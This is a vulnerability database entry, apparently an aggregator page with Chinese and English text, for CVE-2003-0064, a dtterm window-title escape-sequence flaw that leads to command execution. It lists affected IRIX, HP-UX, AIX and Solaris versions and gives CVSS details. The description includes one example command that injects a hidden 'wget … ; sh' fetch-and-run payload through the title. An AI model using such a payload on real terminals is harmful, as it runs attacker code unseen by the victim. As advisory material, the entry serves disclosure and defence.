CVE-2003-0064 (CNNVD-200303-003)

HIGH
中文标题:
DTTerm窗口标题转义序列命令执行漏洞
英文标题:
The dtterm terminal emulator allows attackers to modify the window title via a certain character esc...
CVSS分数: 7.5
发布时间: 2004-09-01 04:00:00
漏洞类型: 授权问题
状态: PUBLISHED
数据质量分数: 0.30
数据版本: v3
漏洞描述
中文描述:

转义序列(escape sequence)是一系列由ASCII转义字符(0x1B)开始的字符序列,并附带特殊的参数构成,转义序列一般原用于控制显示设备如终端,现在扩展在大多数操作系统中允许多种形式的交互。转义序列可以用于更改文本属性(颜色,宽度),移动鼠标位置,重配置键盘,更新窗口标题,或者操作打印机等。 DTTerm终端模拟器的窗口标题报告功能由于没有检查用户插入的转义字符,远程攻击者可以利用这个漏洞在终端窗口标题中插入任意转义序列字符而以执行用户权限执行任意命令。 多数终端模拟器支持使用转义序列通过SHELL来设置窗口标题,这个功能由DEC的DECterm中实现,已经移植在多数模拟器中,使用echo命令可以设置终端的窗口标题: $ echo -e "\e]2;This is the new window title\a" 当上面的命令显示在终端上的时候,它会设置窗口标题为上面的字符串,设置窗口标题本身没有安全问题,但是DTTerm提供转义序列来报告当前窗口标题,获得标题后直接放到命令行中执行。由于多数模拟器处理转义序列不能在窗口标题中嵌入回车符,因此要执行标题作为命令处理,需要用户交互按回车键,如下面的报告窗口标题的转义序列: $ echo -e "\e]2;;wget 127.0.0.1/.bd;sh .bd;exit;\a\e[21t\e]2;xterm\aPress Enter>\e[8m;" 当然这些标题没有人会去执行,但是通过设置标题为不可见字符,如前景后景全为一个颜色,在诱使用户处理窗口后,用户在不能看到标题的情况下而执行了恶意命令,有可能导致各种攻击,如开端口,发送敏感文件等操作。

英文描述:

The dtterm terminal emulator allows attackers to modify the window title via a certain character escape sequence and then insert it back to the command line in the user's terminal, e.g. when the user views a file containing the malicious sequence, which could allow the attacker to execute arbitrary commands.

CWE类型:
(暂无数据)
标签:
(暂无数据)
受影响产品
厂商 产品 版本 版本范围 平台 CPE
sgi irix 5.0 - - cpe:2.3:o:sgi:irix:5.0:*:*:*:*:*:*:*
sgi irix 5.0.1 - - cpe:2.3:o:sgi:irix:5.0.1:*:*:*:*:*:*:*
sgi irix 5.1 - - cpe:2.3:o:sgi:irix:5.1:*:*:*:*:*:*:*
sgi irix 5.1.1 - - cpe:2.3:o:sgi:irix:5.1.1:*:*:*:*:*:*:*
sgi irix 5.2 - - cpe:2.3:o:sgi:irix:5.2:*:*:*:*:*:*:*
sgi irix 5.3 - - cpe:2.3:o:sgi:irix:5.3:*:*:*:*:*:*:*
sgi irix 6.0 - - cpe:2.3:o:sgi:irix:6.0:*:*:*:*:*:*:*
sgi irix 6.0.1 - - cpe:2.3:o:sgi:irix:6.0.1:*:*:*:*:*:*:*
sgi irix 6.1 - - cpe:2.3:o:sgi:irix:6.1:*:*:*:*:*:*:*
sgi irix 6.2 - - cpe:2.3:o:sgi:irix:6.2:*:*:*:*:*:*:*
sgi irix 6.3 - - cpe:2.3:o:sgi:irix:6.3:*:*:*:*:*:*:*
sgi irix 6.4 - - cpe:2.3:o:sgi:irix:6.4:*:*:*:*:*:*:*
sgi irix 6.5 - - cpe:2.3:o:sgi:irix:6.5:*:*:*:*:*:*:*
sgi irix 6.5.1 - - cpe:2.3:o:sgi:irix:6.5.1:*:*:*:*:*:*:*
sgi irix 6.5.2 - - cpe:2.3:o:sgi:irix:6.5.2:*:*:*:*:*:*:*
sgi irix 6.5.2f - - cpe:2.3:o:sgi:irix:6.5.2f:*:*:*:*:*:*:*
sgi irix 6.5.2m - - cpe:2.3:o:sgi:irix:6.5.2m:*:*:*:*:*:*:*
sgi irix 6.5.3 - - cpe:2.3:o:sgi:irix:6.5.3:*:*:*:*:*:*:*
sgi irix 6.5.3f - - cpe:2.3:o:sgi:irix:6.5.3f:*:*:*:*:*:*:*
sgi irix 6.5.3m - - cpe:2.3:o:sgi:irix:6.5.3m:*:*:*:*:*:*:*
sgi irix 6.5.4 - - cpe:2.3:o:sgi:irix:6.5.4:*:*:*:*:*:*:*
sgi irix 6.5.4f - - cpe:2.3:o:sgi:irix:6.5.4f:*:*:*:*:*:*:*
sgi irix 6.5.4m - - cpe:2.3:o:sgi:irix:6.5.4m:*:*:*:*:*:*:*
sgi irix 6.5.5 - - cpe:2.3:o:sgi:irix:6.5.5:*:*:*:*:*:*:*
sgi irix 6.5.5f - - cpe:2.3:o:sgi:irix:6.5.5f:*:*:*:*:*:*:*
sgi irix 6.5.5m - - cpe:2.3:o:sgi:irix:6.5.5m:*:*:*:*:*:*:*
sgi irix 6.5.6 - - cpe:2.3:o:sgi:irix:6.5.6:*:*:*:*:*:*:*
sgi irix 6.5.6f - - cpe:2.3:o:sgi:irix:6.5.6f:*:*:*:*:*:*:*
sgi irix 6.5.6m - - cpe:2.3:o:sgi:irix:6.5.6m:*:*:*:*:*:*:*
sgi irix 6.5.7 - - cpe:2.3:o:sgi:irix:6.5.7:*:*:*:*:*:*:*
sgi irix 6.5.7f - - cpe:2.3:o:sgi:irix:6.5.7f:*:*:*:*:*:*:*
sgi irix 6.5.7m - - cpe:2.3:o:sgi:irix:6.5.7m:*:*:*:*:*:*:*
sgi irix 6.5.8 - - cpe:2.3:o:sgi:irix:6.5.8:*:*:*:*:*:*:*
sgi irix 6.5.8f - - cpe:2.3:o:sgi:irix:6.5.8f:*:*:*:*:*:*:*
sgi irix 6.5.8m - - cpe:2.3:o:sgi:irix:6.5.8m:*:*:*:*:*:*:*
sgi irix 6.5.9 - - cpe:2.3:o:sgi:irix:6.5.9:*:*:*:*:*:*:*
sgi irix 6.5.9f - - cpe:2.3:o:sgi:irix:6.5.9f:*:*:*:*:*:*:*
sgi irix 6.5.9m - - cpe:2.3:o:sgi:irix:6.5.9m:*:*:*:*:*:*:*
sgi irix 6.5.10 - - cpe:2.3:o:sgi:irix:6.5.10:*:*:*:*:*:*:*
sgi irix 6.5.10f - - cpe:2.3:o:sgi:irix:6.5.10f:*:*:*:*:*:*:*
sgi irix 6.5.10m - - cpe:2.3:o:sgi:irix:6.5.10m:*:*:*:*:*:*:*
sgi irix 6.5.11 - - cpe:2.3:o:sgi:irix:6.5.11:*:*:*:*:*:*:*
sgi irix 6.5.11f - - cpe:2.3:o:sgi:irix:6.5.11f:*:*:*:*:*:*:*
sgi irix 6.5.11m - - cpe:2.3:o:sgi:irix:6.5.11m:*:*:*:*:*:*:*
sgi irix 6.5.12 - - cpe:2.3:o:sgi:irix:6.5.12:*:*:*:*:*:*:*
sgi irix 6.5.12f - - cpe:2.3:o:sgi:irix:6.5.12f:*:*:*:*:*:*:*
sgi irix 6.5.12m - - cpe:2.3:o:sgi:irix:6.5.12m:*:*:*:*:*:*:*
sgi irix 6.5.13 - - cpe:2.3:o:sgi:irix:6.5.13:*:*:*:*:*:*:*
sgi irix 6.5.13f - - cpe:2.3:o:sgi:irix:6.5.13f:*:*:*:*:*:*:*
sgi irix 6.5.13m - - cpe:2.3:o:sgi:irix:6.5.13m:*:*:*:*:*:*:*
sgi irix 6.5.14 - - cpe:2.3:o:sgi:irix:6.5.14:*:*:*:*:*:*:*
sgi irix 6.5.14f - - cpe:2.3:o:sgi:irix:6.5.14f:*:*:*:*:*:*:*
sgi irix 6.5.14m - - cpe:2.3:o:sgi:irix:6.5.14m:*:*:*:*:*:*:*
sgi irix 6.5.15 - - cpe:2.3:o:sgi:irix:6.5.15:*:*:*:*:*:*:*
sgi irix 6.5.15f - - cpe:2.3:o:sgi:irix:6.5.15f:*:*:*:*:*:*:*
sgi irix 6.5.15m - - cpe:2.3:o:sgi:irix:6.5.15m:*:*:*:*:*:*:*
sgi irix 6.5.16 - - cpe:2.3:o:sgi:irix:6.5.16:*:*:*:*:*:*:*
sgi irix 6.5.16f - - cpe:2.3:o:sgi:irix:6.5.16f:*:*:*:*:*:*:*
sgi irix 6.5.16m - - cpe:2.3:o:sgi:irix:6.5.16m:*:*:*:*:*:*:*
sgi irix 6.5.17 - - cpe:2.3:o:sgi:irix:6.5.17:*:*:*:*:*:*:*
sgi irix 6.5.17f - - cpe:2.3:o:sgi:irix:6.5.17f:*:*:*:*:*:*:*
sgi irix 6.5.17m - - cpe:2.3:o:sgi:irix:6.5.17m:*:*:*:*:*:*:*
sgi irix 6.5.18 - - cpe:2.3:o:sgi:irix:6.5.18:*:*:*:*:*:*:*
sgi irix 6.5.18f - - cpe:2.3:o:sgi:irix:6.5.18f:*:*:*:*:*:*:*
sgi irix 6.5.18m - - cpe:2.3:o:sgi:irix:6.5.18m:*:*:*:*:*:*:*
hp hp-ux 10.20 - - cpe:2.3:o:hp:hp-ux:10.20:*:*:*:*:*:*:*
hp hp-ux 10.24 - - cpe:2.3:o:hp:hp-ux:10.24:*:*:*:*:*:*:*
hp hp-ux 10.26 - - cpe:2.3:o:hp:hp-ux:10.26:*:*:*:*:*:*:*
hp hp-ux 10.30 - - cpe:2.3:o:hp:hp-ux:10.30:*:*:*:*:*:*:*
hp hp-ux 10.34 - - cpe:2.3:o:hp:hp-ux:10.34:*:*:*:*:*:*:*
hp hp-ux 11.00 - - cpe:2.3:o:hp:hp-ux:11.00:*:*:*:*:*:*:*
hp hp-ux 11.04 - - cpe:2.3:o:hp:hp-ux:11.04:*:*:*:*:*:*:*
hp hp-ux 11.11 - - cpe:2.3:o:hp:hp-ux:11.11:*:*:*:*:*:*:*
hp hp-ux 11.20 - - cpe:2.3:o:hp:hp-ux:11.20:*:*:*:*:*:*:*
hp hp-ux 11.22 - - cpe:2.3:o:hp:hp-ux:11.22:*:*:*:*:*:*:*
ibm aix 4.3 - - cpe:2.3:o:ibm:aix:4.3:*:*:*:*:*:*:*
ibm aix 4.3.1 - - cpe:2.3:o:ibm:aix:4.3.1:*:*:*:*:*:*:*
ibm aix 4.3.2 - - cpe:2.3:o:ibm:aix:4.3.2:*:*:*:*:*:*:*
ibm aix 4.3.3 - - cpe:2.3:o:ibm:aix:4.3.3:*:*:*:*:*:*:*
ibm aix 5.1 - - cpe:2.3:o:ibm:aix:5.1:*:*:*:*:*:*:*
ibm aix 5.2 - - cpe:2.3:o:ibm:aix:5.2:*:*:*:*:*:*:*
sun solaris 2.5.1 - - cpe:2.3:o:sun:solaris:2.5.1:*:x86:*:*:*:*:*
sun solaris 2.6 - - cpe:2.3:o:sun:solaris:2.6:*:*:*:*:*:*:*
sun solaris 7.0 - - cpe:2.3:o:sun:solaris:7.0:*:x86:*:*:*:*:*
sun solaris 8.0 - - cpe:2.3:o:sun:solaris:8.0:*:x86:*:*:*:*:*
sun solaris 9.0 - - cpe:2.3:o:sun:solaris:9.0:*:sparc:*:*:*:*:*
sun sunos - - - cpe:2.3:o:sun:sunos:-:*:*:*:*:*:*:*
sun sunos 5.5.1 - - cpe:2.3:o:sun:sunos:5.5.1:*:*:*:*:*:*:*
sun sunos 5.7 - - cpe:2.3:o:sun:sunos:5.7:*:*:*:*:*:*:*
sun sunos 5.8 - - cpe:2.3:o:sun:sunos:5.8:*:*:*:*:*:*:*
解决方案
中文解决方案:
(暂无数据)
英文解决方案:
(暂无数据)
临时解决方案:
(暂无数据)
参考链接
20030224 Terminal Emulator Security Issues mailing-list
cve.org
访问
HPSBUX0401-309 vendor-advisory
cve.org
访问
terminal-emulator-window-title(11414) vdb-entry
cve.org
访问
20030224 Terminal Emulator Security Issues mailing-list
cve.org
访问
6942 vdb-entry
cve.org
访问
CVSS评分详情
7.5
HIGH
CVSS向量: AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSS版本: 2.0
机密性
PARTIAL
完整性
PARTIAL
可用性
PARTIAL
时间信息
发布时间:
2004-09-01 04:00:00
修改时间:
2024-08-08 01:43:35
创建时间:
2025-11-11 15:32:18
更新时间:
2025-11-11 15:48:50
利用信息
暂无可利用代码信息
数据源详情
数据源 记录ID 版本 提取时间
CVE cve_CVE-2003-0064 2025-11-11 15:17:26 2025-11-11 07:32:18
NVD nvd_CVE-2003-0064 2025-11-11 14:50:37 2025-11-11 07:41:04
CNNVD cnnvd_CNNVD-200303-003 2025-11-11 15:08:42 2025-11-11 07:48:50
版本与语言
当前版本: v3
主要语言: EN
支持语言:
EN ZH
安全公告
暂无安全公告信息
变更历史
v3 CNNVD
2025-11-11 15:48:50
vulnerability_type: 未提取 → 授权问题; cnnvd_id: 未提取 → CNNVD-200303-003; data_sources: ['cve', 'nvd'] → ['cnnvd', 'cve', 'nvd']
查看详细变更
  • vulnerability_type: 未提取 -> 授权问题
  • cnnvd_id: 未提取 -> CNNVD-200303-003
  • data_sources: ['cve', 'nvd'] -> ['cnnvd', 'cve', 'nvd']
v2 NVD
2025-11-11 15:41:04
severity: SeverityLevel.MEDIUM → SeverityLevel.HIGH; cvss_score: 未提取 → 7.5; cvss_vector: NOT_EXTRACTED → AV:N/AC:L/Au:N/C:P/I:P/A:P; cvss_version: NOT_EXTRACTED → 2.0; affected_products_count: 0 → 90; data_sources: ['cve'] → ['cve', 'nvd']
查看详细变更
  • severity: SeverityLevel.MEDIUM -> SeverityLevel.HIGH
  • cvss_score: 未提取 -> 7.5
  • cvss_vector: NOT_EXTRACTED -> AV:N/AC:L/Au:N/C:P/I:P/A:P
  • cvss_version: NOT_EXTRACTED -> 2.0
  • affected_products_count: 0 -> 90
  • data_sources: ['cve'] -> ['cve', 'nvd']